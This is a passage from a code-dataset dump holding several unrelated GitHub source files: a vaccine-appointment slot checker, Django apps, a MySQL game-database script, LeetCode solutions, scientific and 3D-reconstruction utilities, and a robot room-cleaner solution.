params['bookingGuideline'] = 'COVIDVACCINE'\n\n uri = f\"{self.SLOT_REQUEST}/{facility}/slot-locks\"\n headers = {'Cookie': self.session.cookies, 'Content-Type': 'application/json'}\n\n try:\n response = requests.post(uri, headers=headers, params=params)\n response.raise_for_status()\n except requests.exceptions.HTTPError as errh:\n logger.debug(\"Http Error:\", errh)\n # most likely login is out of date\n raise TokenExpiredException(errh)\n except requests.exceptions.ConnectionError as errc:\n logger.error(\"Error Connecting:\", errc)\n except requests.exceptions.Timeout as errt:\n logger.error(\"Timeout Error:\", errt)\n except requests.exceptions.RequestException as err:\n logger.error(\"Oops: Something Else\", err)\n else:\n if (response):\n t = response.json()\n if not t['slots']:\n logger.info(f\"No slots available at: {facility}\")\n return 0\n else:\n logger.info(t)\n\n appointmentList = []\n for sl in t['slots']:\n appt = f\"* {sl['facilityName']} at {sl['appointmentDate']} {sl['appointmentTime']}\"\n appointmentList.append(appt)\n\n logger.info(f\"SLOTS AVAILABLE: {facility}\")\n TwilioNotifier.send_notification(f\"Vaccine slot(s) at {facility} - {'|'.join(appointmentList)}\")\n return len(appointmentList)\n\n logger.warning(f\"Response for slots at {facility} was empty\")\n return -1\n\n ##-------------------------------\n\n def delete_appointment(self):\n logger.debug('cleaning up appointments related to token...')\n\n headers = {'Cookie': self.session.cookies}\n\n params = {}\n params['tokenIdQuery'] = self.session.token\n\n try:\n response = requests.delete(self.SLOT_DELETE, headers=headers, params=params)\n except requests.exceptions.HTTPError as errh:\n logger.error(\"Http Error:\", errh)\n except requests.exceptions.ConnectionError as errc:\n logger.error(\"Error Connecting:\", errc)\n except requests.exceptions.Timeout as errt:\n logger.error(\"Timeout Error:\", errt)\n except requests.exceptions.RequestException as err:\n logger.error(\"Oops: Something Else\", err)\n\n ##-------------------------------\n\n def get_appointment(self):\n self.do_login(False)\n self.delete_appointment()","repo_name":"macgngsta/python-product-checker","sub_path":"checker/strategy/kaiser_norcal_strategy.py","file_name":"kaiser_norcal_strategy.py","file_ext":"py","file_size_in_byte":8924,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"18864913870","text":"def 
isBodyValid(body):\r\n valid = 0\r\n if len(body) == 3:\r\n valid += 1\r\n keyList = ['id', 'player', 'position']\r\n subkeyList = ['x','y']\r\n if all(key in body for key in keyList):\r\n valid += 1\r\n if all(subkey in body['position'] for subkey in subkeyList):\r\n valid += 1\r\n if body['position']['x']<3 and body['position']['x']>=0:\r\n valid += 1\r\n if body['position']['y']<3 and body['position']['y']>=0:\r\n valid += 1\r\n if valid == 5:\r\n return True\r\n else:\r\n return False","repo_name":"ftcRibeiro/jogoDaVelha","sub_path":"src/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"24429859531","text":"name = \"qualityCheck\"\n\nversion = \"0.0.0\"\n\nauthors = [\"ArtFx TD gang\"]\n\ndescription = \\\n \"\"\"\n Python maya Packages.\n Use to converse with Maya dcc\n \"\"\"\n\nrequires = [\n \"python\",\n \"checkLib\",\n \"PySide2\",\n \"shiboken2\"\n]\nvcs = \"git\"\n\n\ndef commands():\n global env\n env.PATH.append(\"{root}/lib\")\n env.PYTHONPATH.append(\"{root}/lib\")\n\n\ntests = {\n \"unit\": \"python -m unittest discover -s {root}/tests\",\n \"lint\": {\n \"command\": \"pylint scripts\",\n \"requires\": [\"pylint\"],\n \"run_on\": [\"default\", \"pre_release\"]\n },\n \"maya\": {\n \"command\": \"mayapy {root}/tests/qualitycheck_test.py\",\n \"requires\": [\"maya\"],\n \"run_on\": \"explicit\"\n },\n}\n","repo_name":"Soulayrol/Pipeline","sub_path":"packages/artfx/qualityCheck/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"6244569144","text":"from multiprocessing import Pool, cpu_count\nimport numpy as np\nimport os, imghdr\nfrom shutil import copy\nimport pandas as pd\nfrom time import sleep\nfrom scipy.spatial import distance_matrix\nfrom PyQt5 import QtCore\n\nimport CHUBACAPP.utils.pyvista_utils as pv_utils\nimport CHUBACAPP.utils.sfm as sfm\nimport CHUBACAPP.post_reprojection.permutator as pm\nimport CHUBACAPP.blender.blender_reprojection as brp\nimport CHUBACAPP.utils.export_annotations as exp_tools\n\n\nclass DISThread(QtCore.QThread):\n \"\"\"Detects the blurry image and store their reference for later suppression\"\"\"\n prog_val = QtCore.pyqtSignal(int)\n finished = QtCore.pyqtSignal()\n\n def __init__(self, sfm_path, model_path, camera_model, img_path, method):\n super(DISThread, self).__init__()\n self.running = True\n self.sfm_path = sfm_path\n self.model_path = model_path\n self.camera_model = camera_model\n self.img_path = img_path\n self.method = method\n\n def run(self):\n disjoint_image_selection(self.sfm_path, self.model_path, self.camera_model, self.img_path, self.method, self)\n\n\ndef disjoint_image_selection(sfm_path, model_path, camera_model, img_path, method, thread=None):\n dist_filter = 12\n\n output_path = os.path.join(img_path, \"disjoint_img_selection\")\n isExist = os.path.exists(output_path)\n if not isExist:\n os.makedirs(output_path)\n\n print(\"Initiating...\")\n if thread is not None:\n thread.prog_val.emit(round(0))\n\n sfm_data = sfm.sfm_data_handler(sfm_path, None, True)\n camera_points = sfm.extract_camera_points(sfm_data)\n dm = camera_points_distance_matrix(camera_points)\n list_img_model = camera_points['filename'].unique()\n list_img = list_image_in_model(img_path, list_img_model)\n print(\"Done !\")\n\n print(\"Getting image bound... 
{} images to reproject\".format(len(list_img)))\n json_path = get_bounds(list_img, sfm_path, model_path, output_path, camera_model)\n print(\"Done !\")\n\n print(\"Getting contact matrix...\")\n M, volumes = contact_matrix(json_path, dm, dist_filter, thread)\n pd.DataFrame(M).to_csv(os.path.join(output_path, 'contact_matrix.csv'), index=False, header=False)\n print(\"Done !\")\n\n print(\"Image selection...\")\n if method == \"Forward\":\n keep = pm.forward(M)\n elif method == \"permutations\":\n keep = pm.permutate(M)\n else:\n print(\"Not a valid method, aborting...\")\n if thread is not None:\n thread.prog_val.emit(0)\n thread.finished.emit()\n thread.running = False\n\n return 0\n print(\"Done !\")\n\n pv_utils.save_volumes(volumes, keep, output_path)\n filter_images(img_path, keep, volumes)\n print(\"Saved !\")\n\n if thread is not None:\n thread.prog_val.emit(0)\n thread.finished.emit()\n thread.running = False\n\n return 1\n\n\ndef contact_matrix(json_path, dm, dist_filter, thread=None):\n annotations = pv_utils.parse_annotation(json_path)\n ann_volumes = []\n if thread is not None:\n thread.prog_val.emit(0)\n prog = 0\n tot_len = len(annotations)\n for annotation in annotations:\n if thread is not None:\n thread.prog_val.emit(round((prog / tot_len) * 100))\n prog += 1\n if annotation[0] == 'bound' and len(annotation[1]) != 1:\n mesh = pv_utils.points_to_mesh(annotation[1])\n volume = pv_utils.get_volume(mesh)\n filename = annotation[2]\n ann_volumes.append([filename, volume])\n\n print(\"Starting contact analysis... {} images to analyse\".format(len(ann_volumes)))\n contact_matrix = np.zeros(shape=(len(ann_volumes), len(ann_volumes)))\n if thread is not None:\n thread.prog_val.emit(0)\n tot_len = len(ann_volumes)\n for i in range(len(ann_volumes)):\n if thread is not None:\n thread.prog_val.emit(round((i / tot_len) * 100))\n for j in range(len(ann_volumes)):\n if dm[i, j] < dist_filter:\n k, intersection = ann_volumes[i][1].collision(ann_volumes[j][1], 1)\n if intersection:\n contact_matrix[i, j] = 1\n print(\"Done !\")\n\n return contact_matrix, ann_volumes\n\n\ndef camera_points_distance_matrix(camera_points):\n positions = []\n for index, row in camera_points.iterrows():\n positions.append([float(row['x']), float(row['y']), float(row['z'])])\n\n dm = distance_matrix(positions, positions)\n return dm\n\n\ndef multi_process_reprojection(args):\n sfm_path, model_path, list_imgs, camera_model, annotations, i = args\n sleep(i * 10) # avoid problems in json read\n ann23d = brp.annotationsTo3D(sfm_path, model_path, list_imgs, camera_model)\n\n polygon = []\n for image in list_imgs:\n result = ann23d.reproject(annotations, image, False)\n polygon.extend(result[2])\n\n return polygon\n\n\ndef get_bounds(list_imgs, sfm_path, model_path, output_path, camera_model):\n multipro = True\n annotations = pd.DataFrame(\n columns=['filename', 'shape_name', 'points', 'label_name', 'label_hierarchy', 'annotation_id'])\n\n nb_processes = cpu_count()\n img_list_split = np.array_split(list_imgs, nb_processes)\n args = []\n i = 0\n for img_list_i in img_list_split:\n args.append([sfm_path, model_path, img_list_i, camera_model, annotations, i])\n i += 1\n\n if multipro:\n print(\"Starting multiprocessing reprojection...\")\n results = list(Pool(nb_processes).map(multi_process_reprojection, args))\n print(\"Done !\")\n\n else:\n results = []\n for arg in args:\n results.append(multi_process_reprojection(arg))\n\n polygon = []\n for result in results:\n polygon.extend(result)\n\n json_path = 
exp_tools.save_bounds_polygons(output_path, polygon)\n\n return json_path\n\n\ndef filter_images(data_path, keep, volumes):\n img_to_keep = []\n for i in range(len(volumes)):\n if keep[i]:\n img_to_keep.append(volumes[i][0])\n\n select_path = os.path.join(data_path, \"disjoint_img_selection\")\n isExist = os.path.exists(select_path)\n if not isExist:\n os.makedirs(select_path)\n\n for file in os.listdir(data_path): # for each image in the directory\n if os.path.isfile(os.path.join(data_path, file)): # Check if it is a file\n if imghdr.what(os.path.join(data_path, file)) == \"jpeg\":\n if file in img_to_keep:\n copy(os.path.join(data_path, file), select_path)\n\n\ndef list_image_in_model(dir, img_in_model):\n list_img = []\n for file in os.listdir(dir): # for each image in the directory\n if os.path.isfile(os.path.join(dir, file)): # Check if it is a file\n if imghdr.what(os.path.join(dir, file)) == \"jpeg\":\n if file in img_in_model:\n list_img.append(file)\n return list_img\n","repo_name":"marinmarcillat/CHUBACAPP","sub_path":"CHUBACAPP/post_reprojection/no_overlap.py","file_name":"no_overlap.py","file_ext":"py","file_size_in_byte":6862,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"} +{"seq_id":"24983499100","text":"\"\"\"\nState compression + prefix XOR sum\n\"\"\"\n\nfrom collections import Counter\n\nclass Solution:\n def wonderfulSubstrings(self, word: str) -> int:\n dic = Counter([0])\n ans = 0\n mask = 0\n\n for ch in word:\n step = ord(ch) - ord('a')\n mask ^= (1 << step)\n if mask in dic:\n ans += dic[mask]\n for i in range(10):\n pre_mask = mask ^ (1 << i)\n if pre_mask in dic:\n ans += dic[pre_mask]\n dic[mask] += 1\n \n return ans","repo_name":"thorseraq/leetcode-playground","sub_path":"python/进阶/5799. 最美子字符串的数目.py","file_name":"5799. 
最美子字符串的数目.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"42833107081","text":"from django.contrib import admin\nfrom .models import Movie\n\nclass MovieList(admin.ModelAdmin):\n list_display = ('name', 'year', 'description', 'rating')\n list_filter = ('name', 'year', 'rating')\n search_fields = ('name', 'description')\n ordering = ['year']\n\n\nadmin.site.register(Movie, MovieList)\n\n","repo_name":"boboyan/assignment2part2","sub_path":"api/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"31098267215","text":"class Solution:\n def minAddToMakeValid(self, S: str) -> int:\n uncom = 0\n toadd = 0\n for c in S:\n if c == '(':\n uncom += 1\n else:\n if uncom == 0:\n toadd += 1\n else:\n uncom -= 1\n return uncom + toadd\n\nif __name__ == \"__main__\":\n print(Solution().minAddToMakeValid('))(())('))\n\n","repo_name":"johnxguo/leetcode","sub_path":"921/921.py","file_name":"921.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"36168796165","text":"import sys\nimport MySQLdb\n\ndef Conectar_BD(host,usuario,password,nombrebd):\n try:\n db = MySQLdb.connect(host,usuario,password,nombrebd)\n return db\n except MySQLdb.Error as e:\n print(\"No puedo conectar a la base de datos:\",e)\n sys.exit(1)\n\ndef Desconectar_BD(db):\n db.close()\n\ndef ListarMapas(db):\n sql=\"select * from Mapas\"\n cursor = db.cursor(MySQLdb.cursors.DictCursor)\n try:\n cursor.execute(sql)\n registros = cursor.fetchall()\n for registro in registros:\n print(registro[\"nombre\"],\"---\",registro[\"nZonas\"],\" zonas\")\n except:\n print(\"Error en la consulta\")\n\ndef MonstruoSubcadena(db,monstruo):\n sql = \"SELECT * FROM Monstruos WHERE nombre REGEXP '^%s'\"%(monstruo)\n cursor = db.cursor(MySQLdb.cursors.DictCursor)\n try:\n cursor.execute(sql)\n registros = cursor.fetchall()\n for registro in registros:\n print(registro[\"nombre\"])\n return registro[\"nombre\"]\n\n except:\n print(\"Error en la consulta\")\n\ndef ObjetoMonstruo(db,monstruo):\n MonstruoSubcadena(db,monstruo)\n sql = \"SELECT * FROM Objetos WHERE monstruo = (SELECT idMonstruo FROM Monstruos WHERE nombre REGEXP '^%s')\"%(monstruo)\n cursor = db.cursor(MySQLdb.cursors.DictCursor)\n try:\n cursor.execute(sql)\n registros = cursor.fetchall()\n for registro in registros:\n print(registro[\"nombre\"])\n except:\n print(\"Error en la consulta\")\n\ndef NuevoMonstruo(db,nuevo):\n cursor = db.cursor()\n sql=\"insert into Monstruos values (%s, '%s', '%s', %f )\" % (nuevo[\"idMonstruo\"],nuevo[\"nombre\"],nuevo[\"tipo\"],nuevo[\"tamano\"])\n try:\n cursor.execute(sql)\n db.commit()\n except:\n print(\"Error al insertar.\")\n db.rollback()\n\ndef borrarObjeto(db,monstruo):\n buscar = MonstruoSubcadena(db,monstruo)\n sql=\"delete from Objetos where monstruo=(select idMonstruo from Monstruos where nombre = '%s')\" % buscar\n cursor = db.cursor()\n try:\n cursor.execute(sql)\n db.commit()\n if cursor.rowcount==0:\n print(\"No hay objetos relacionados con ese monstruo\")\n except:\n print(\"Error al borrar.\")\n db.rollback()\n\ndef AumentarValor(db,porcentaje):\n sql = \"update Objetos SET valor = valor+(valor*%f)/100\"%porcentaje\n cursor = db.cursor()\n try:\n cursor.execute(sql)\n db.commit()\n except:\n print(\"Error al 
cambiar\")\n db.rollback()\n\ndef MostrarMenu():\n menu='''\n 1. Lista los mapas y el total de zonas que tiene cada uno.\n 2. Muestra los monstruos que empiecen por una subcadena.\n 3. Pide por teclado un monstruo y muestra los objetos que suelta al morir.\n 4. Inserta un nuevo monstruo en la tabla Monstruos.\n 5. Borra los objetos de un monstruo indicado por teclado.\n 6. aumenta el valor de los objetos un porcentaje indicado por teclado.\n 0. Salir\n '''\n print(menu)\n while True:\n try:\n opcion=int(input(\"Opción:\"))\n return opcion\n except:\n print(\"Opción incorrecta, debe ser un número\")","repo_name":"robertorodriguez98/proyecto_BD","sub_path":"funciones.py","file_name":"funciones.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71659692203","text":"#######################################\n# imports\n\nimport maya.cmds as cmds\n\nimport esa.maya.python.lib.deploy as deploy\n\nreload(deploy)\n\n#######################################\n# attributes\n\npermission = \"developer\"\n\n#######################################\n# functionality\n\ndef deployCurrentToolCageRun():\n\tdeploy.deployCurrentToolCageDev()\n\tcmds.confirmDialog(t=\"msg\", message=\"Current ToolGage DEV deployed to TOOLS.\", button=[\"OK\"]) \n\n#######################################\n# execution\n\nif __name__ == \"__main__\": deployCurrentToolCageRun()","repo_name":"esernaalonso/dev","sub_path":"maya/python/script/deployCurrentToolCage.py","file_name":"deployCurrentToolCage.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"27657369783","text":"import codecs\nimport jpype\nimport glob\nimport nltk\nfrom nltk.probability import ConditionalFreqDist\nfrom nltk.tokenize import RegexpTokenizer,sent_tokenize\n\nword_count_dict = {}\n\ndef startJVM():\n\n jpype.startJVM(jpype.getDefaultJVMPath(),\n \"-Djava.class.path=C:/Users/vct_3/Desktop/Tezim/zemberek_jar/zemberek-tum-2.0.jar\", \"-ea\")\n\n Tr = jpype.JClass(\"net.zemberek.tr.yapi.TurkiyeTurkcesi\")\n\n tr = Tr()\n\n Zemberek = jpype.JClass(\"net.zemberek.erisim.Zemberek\")\n\n zemberek = Zemberek(tr)\n return zemberek\n#kelime analizi yapılacak dosyalar okunur\ndef readFile(filename):\n corpus_raw = u\"\"\n print(\"Reading '{0}'...\".format(filename))\n with codecs.open(filename, \"r\") as book_file:\n corpus_raw += book_file.read()\n return corpus_raw\n\n#gelen kelimelerin türü belirlenir\ndef kelimeCozumle(words, zemberek, word_types):\n for word in words:\n if word.strip()>'':\n yanit = zemberek.kelimeCozumle(word)\n if yanit:\n tip = yanit[0].kok().tip()\n if str(tip) in word_types:\n word_types[str(tip)] = word_types[str(tip)] + 1\n\n\ndef explodeSentences(sentences, punkt_dict, zemberek, word_types):\n #cümleler kelimelere parçalanır\n words = []\n for sentence in sentences:\n words.extend(sentence.split())\n kelimeCozumle(sentence.split(), zemberek, word_types)\n\n #Cümle içindeki noktalama işaretlerinin sayısı\n for word in words:\n for punkt in punkt_dict:\n if punkt in word:\n punkt_dict[punkt] = punkt_dict[punkt] + 1\n\n #metin içindeki farklı kelime sayısı\n from collections import Counter\n word_count_dict = Counter(w.title() for w in words)\n return words, word_count_dict\n\ndef writeFile(result):\n file = open(\"clear_data.csv\",\"w\")\n file.write(result)\n file.close()\n\n\ndef startApp():\n # Zemberek nesnesi oluşturuldu.\n zemberek = 
startJVM()\n book_filenames = sorted(glob.glob(\"C:/Users/vct_3/Desktop/Köşe Yazıları Kopya/*.txt\"))\n result = \"\"\n\n for filename in book_filenames:\n\n punkt_dict = {\"!\": 0, \".\": 0, \",\": 0, \"?\": 0, \":\": 0}\n word_types = {\"ISIM\": 0, \"FIIL\": 0, \"SIFAT\": 0, \"ZAMIR\": 0, \"ZARF\": 0, \"BAGLAC\": 0, \"EDAT\": 0, \"ZAMAN\": 0,\n \"SAYI\": 0, \"OZEL\": 0, \"KISALTMA\": 0, \"SORU\": 0}\n\n # Dosyayı oku\n text = readFile(filename)\n # Dosyadaki cümleleri ayıkla\n sentences = sent_tokenize(text)\n words, word_count_dict = explodeSentences(sentences, punkt_dict, zemberek, word_types)\n\n # Okunan metni dosyaya yazılmak için csv formatına getir.\n result = result + str(len(sentences)) + \",\"\n result = result + str(len(words)) + ',' + str(len(word_count_dict)) + ','\n\n for key, value in punkt_dict.items():\n result = result + str(value) + ','\n for key, value in word_types.items():\n result = result + str(value) + ','\n result = result + (filename.split(\"-\")[1])[:-4] + \"\\n\"\n writeFile(result)\n\n\nstartApp()\n\n# JVM kapat\njpype.shutdownJVM()\n","repo_name":"Souljah1881/Yazar_Tanima","sub_path":"Get_Attributes/Getting_Attributes_of_Authors.py","file_name":"Getting_Attributes_of_Authors.py","file_ext":"py","file_size_in_byte":3103,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"20780306773","text":"\"\"\"\nSetup script for libanac\n\"\"\"\n\nimport sys\nfrom setuptools import setup\n\nimport libanac\n\n\ninstall_requires = [\n 'beautifulsoup4',\n 'requests',\n]\n\nif sys.version_info[:2] < (2, 7):\n install_requires.append('argparse')\n\n\nsetup(\n name=libanac.__title__,\n description=libanac.__summary__,\n long_description=open('README.rst').read(),\n url=libanac.__url__,\n\n author=libanac.__author__,\n author_email=libanac.__email__,\n license=libanac.__license__,\n\n version=libanac.__version__,\n\n packages=['libanac'],\n test_suite='tests',\n\n platforms='any',\n keywords=['ANAC', 'SACI', 'CIV Digital'],\n classifiers=[\n 'Natural Language :: English',\n 'Operating System :: MacOS :: MacOS X',\n 'Operating System :: POSIX',\n 'Operating System :: POSIX :: BSD',\n 'Operating System :: POSIX :: Linux',\n 'Operating System :: Microsoft :: Windows',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: Implementation :: CPython',\n ],\n\n install_requires=install_requires,\n)\n","repo_name":"asenci/libanac","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"14430117998","text":"from time import sleep\nfrom os import system, name as sysname\n\ndef animation(level):\n with open(level, \"r\", encoding=\"utf-8\") as f:\n lines = f.readlines()\n f.close()\n\n ascii_lines = lines[2:26]\n truncated_ascii_lines = [line[:80] for line in ascii_lines]\n system(\"clear\") if sysname == \"posix\" else system(\"cls\")\n\n for line in truncated_ascii_lines:\n print(line)\n\n sleep(5)\n\n for x in range(220):\n print(\"\\033[26A\", end= \"\")\n print(\"\\033[2K\", end = \"\") # erase old line, return cursor to beginning\n truncated_ascii_lines = [line[x+1:80+x+1] for line in ascii_lines]\n sleep(0.04)\n for line in truncated_ascii_lines:\n print(line)\n 
sleep(5)\n\nanimation(\"level0.txt\")","repo_name":"Spellcasting-Devs/Mundane-Reclamation","sub_path":"testing/animation/text_animation.py","file_name":"text_animation.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"3252468522","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 28 2022\n\n@author: yun\n@purpose: Find cycle in graph. Used for identify all ternary zone in Ca-Na-VP phase diagram.\nThis used for calculation chemical potential of Ca, Na and VPO.\n\n# Need to be moved to somewhere else. Need polishing.\n\"\"\"\nimport numpy as np\nfrom compmatscipy.CompAnalyzer import CompAnalyzer\n\n\nclass ternary_chempo:\n\n def __init__(self, edges, data):\n \"\"\"\n Args:\n edges: list of tuples with form [(std formula, std formula)]\n data: energy dictionary with form {'std formula': energy per atom}\n \"\"\"\n self.edges = edges\n self.data = data\n self.cycles = []\n self.vertices = []\n for edge in self.edges:\n for vertex in edge:\n if vertex not in self.vertices:\n self.vertices.append(vertex)\n self.parse_cycles()\n\n @staticmethod\n def gcd(a, b, rtol=1e-03, atol=1e-03):\n # Need caution. Do not use after rounding floats < 3.\n t = min(abs(a), abs(b))\n while abs(b) > rtol * t + atol:\n a, b = b, a % b\n return a\n\n @staticmethod\n def invert(path) -> list:\n\n return ternary_chempo.rotate_to_smallest(path[::-1])\n\n @staticmethod\n # rotate cycle path such that it begins with the smallest node\n def rotate_to_smallest(path) -> list:\n\n n = path.index(min(path))\n return path[n:] + path[:n]\n\n @staticmethod\n def is_visited_node(node, path) -> bool:\n\n return node in path\n\n @staticmethod\n def cmpd_to_fraction(cmpd) -> tuple:\n \"\"\"\n Args:\n Standard Formula\n Returns:\n tuple of Ca, Na in V2(PO4)3\n \"\"\"\n ca = CompAnalyzer(cmpd)\n reduced_ratio = (ca.amt_of_el('O')) / 12\n ca_amt = ca.amt_of_el('Ca') / reduced_ratio\n na_amt = ca.amt_of_el('Na') / reduced_ratio\n\n return ca_amt, na_amt\n\n @staticmethod\n def fraction_to_cmpd(fraction) -> str:\n \"\"\"\n Args:\n tuple of Ca, Na in V2(PO4)3\n Returns:\n Standard Formula\n \"\"\"\n ratio = ternary_chempo.gcd(fraction[0], fraction[1])\n for i in [2, 3, 12]:\n ratio = ternary_chempo.gcd(ratio, i)\n\n formula = ''\n if not fraction[1] == 0:\n formula += 'Na' + str(fraction[1] / ratio)\n if not fraction[0] == 0:\n formula += 'Ca' + str(fraction[0] / ratio)\n\n formula += 'V' + str(np.round(2 / ratio, 3)) + \\\n 'P' + str(np.round(3 / ratio, 3)) + \\\n 'O' + str(np.round(12 / ratio, 3))\n ca = CompAnalyzer(formula)\n\n return ca.std_formula()\n\n @staticmethod\n def is_three_on_line(x, y, z) -> bool:\n\n return (x[0] * (y[1] - z[1]) + y[0] * (z[1] - x[1]) + z[0] * (x[1] - y[1])) == 0\n\n @staticmethod\n def is_point_in_triangle(s, x, y, z) -> bool:\n\n sx = [s[0] - x[0], s[1] - x[1]]\n s_xy = ((y[0] - x[0]) * sx[1] - (y[1] - x[1]) * sx[0]) > 0\n\n if ((z[0] - x[0]) * sx[1] - (z[1] - x[1]) * sx[0] > 0) == s_xy:\n return False\n if ((z[0] - y[0]) * (s[1] - y[1]) - (z[1] - y[1]) * (s[0] - y[0]) > 0) != s_xy:\n return False\n if s == x or s == y or s == z:\n return False\n\n return True\n\n def is_new_path(self, path) -> bool:\n\n return not (path in self.cycles)\n\n def find_new_cycles(self, path) -> None:\n \"\"\"\n Args:\n path: line connecting vertices.\n Returns:\n Add new cycle to self.cycles.\n This does not consider line or non-smallest cycles.\n \"\"\"\n start_node = path[0]\n\n # 
visit each edge and each node of each edge\n for edge in self.edges:\n node1, node2 = edge\n if start_node in edge:\n if node1 == start_node:\n next_node = node2\n else:\n next_node = node1\n if not ternary_chempo.is_visited_node(next_node, path):\n # neighbor node not on path yet\n sub = [next_node]\n sub.extend(path)\n # explore extended path\n self.find_new_cycles(sub)\n elif len(path) == 3 and next_node == path[-1]:\n # cycle found\n p = ternary_chempo.rotate_to_smallest(path)\n inv = ternary_chempo.invert(p)\n if self.is_new_path(p) and self.is_new_path(inv):\n self.cycles.append(p)\n\n def parse_cycles(self) -> None:\n \"\"\"\n Returns:\n None. update self.cycles.\n parse cycles that are in same line or non-smallest.\n \"\"\"\n for edge in self.edges:\n for node in edge:\n self.find_new_cycles([node])\n\n # change string to fraction of Ca, Na.\n fractions = []\n for i in self.cycles:\n temp = []\n for j in i:\n temp.append(ternary_chempo.cmpd_to_fraction(j))\n fractions.append(temp)\n\n # For removing line or triangle that has point in it.\n min_cycle_list = []\n for i in fractions:\n if not ternary_chempo.is_three_on_line(i[0], i[1], i[2]):\n point_in = False\n for j in self.vertices:\n if ternary_chempo.is_point_in_triangle(ternary_chempo.cmpd_to_fraction(j),\n i[0], i[1], i[2]):\n point_in = True\n break\n if point_in:\n continue\n else:\n min_cycle_list.append(i)\n\n self.cycles = []\n for i in min_cycle_list:\n temp = []\n for j in i:\n temp.append(ternary_chempo.fraction_to_cmpd(j))\n self.cycles.append(tuple(temp))\n\n return\n\n def get_chempo_at_one_cycle(self, x, y, z) -> tuple:\n \"\"\"\n Args:\n x, y, z: str of three coordinates in cycles. In std formula.\n Returns:\n Chemical potential of Ca/Na/VPO\n \"\"\"\n concentrations = np.zeros((3, 3))\n energies = np.zeros((3, 1))\n for i, j in enumerate([x, y, z]):\n ca, na = ternary_chempo.cmpd_to_fraction(j)\n concentrations[i, :] = np.array([ca, na, 17])\n energies[i] = self.data[j] * (ca + na + 17)\n\n chempo = np.linalg.inv(concentrations) @ energies\n\n return chempo\n\n \"\"\"\n Ca_voltage = (-chempo[0][0] - 2.0056) / 2\n Na_voltage = (-chempo[1][0] - 1.3225) / 1\n \"\"\"\n\n def get_chempo_at_cycles(self):\n\n chempo_dict = {}\n for i in self.cycles:\n chempo_dict[i] = self.get_chempo_at_one_cycle(i[0], i[1], i[2])\n\n return chempo_dict\n","repo_name":"YunyeongChoi/CaNaVP","sub_path":"plot/chempo_utils.py","file_name":"chempo_utils.py","file_ext":"py","file_size_in_byte":6932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"27387358415","text":"from django.urls import path\n\nfrom .views import *\n\nurlpatterns = [\n path('', OrganizationHome.as_view(), name='orgs'),\n path('keys/', index, name='keys'),\n path('del_org//', delete_org, name=\"del_org\"),\n path('create_org/', create_org, name=\"create_org\"),\n path('update_org//', update_org, name=\"update_org\"),\n path('del_key//', delete_key, name=\"del_key\"),\n path('create_key/', create_key, name=\"create_key\"),\n path('update_key//', update_key, name=\"update_key\"),\n]\n","repo_name":"daniluuuuuuuk/belgosles_test_task","sub_path":"src/organization/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35455550664","text":"\"\"\"\ninterface Robot {\n // returns true if next cell is open and robot moves into the cell.\n // returns false if next cell is obstacle and robot stays 
on the current cell.\n boolean move();\n\n // Robot will stay on the same cell after calling turnLeft/turnRight.\n // Each turn will be 90 degrees.\n void turnLeft();\n void turnRight();\n\n // Clean the current cell.\n void clean();\n}\nExample:\n\nInput:\nroom = [\n [1,1,1,1,1,0,1,1],\n [1,1,1,1,1,0,1,1],\n [1,0,1,1,1,1,1,1],\n [0,0,0,1,0,0,0,0],\n [1,1,1,1,1,1,1,1]\n],\nrow = 1,\ncol = 3\n\nExplanation:\nAll grids in the room are marked by either 0 or 1.\n0 means the cell is blocked, while 1 means the cell is accessible.\nThe robot initially starts at the position of row=1, col=3.\nFrom the top left corner, its position is one row below and three columns right.\n\n\"\"\"\n\n\n\n\"\"\"\nWhen we come to a new cell, we turn left. \nIf we try to go and turn right 3 times, \nwe have covered everything in front of us and we should backtrack. \nIf we can go to a direction, since we are facing backward for backtracking, \nwe should turn left instead of right (if we didn't go, \nwe would still face the direction, not its reverse). \nAlso, when we are done with a cell, we should come back from it. \nHere is a minimalist code to solve the problem.\n\"\"\"\n\nDIRS = [[-1, 0], [0, 1], [1, 0], [0, -1]] # facing up, turning right as index increases\n\n\ndef dfs(robot, coord, dindex, visited):\n visited.add(coord)\n robot.clean()\n last_move = True\n for di in [3, 0, 1, 2]:\n robot.turnLeft() if last_move else robot.turnRight()\n d = DIRS[(dindex + di) % 4]\n new_c = (coord[0] + d[0], coord[1] + d[1])\n\n if new_c not in visited and robot.move():\n dfs(robot, new_c, (dindex + di) % 4, visited)\n robot.move() # come back\n last_move = True\n else:\n last_move 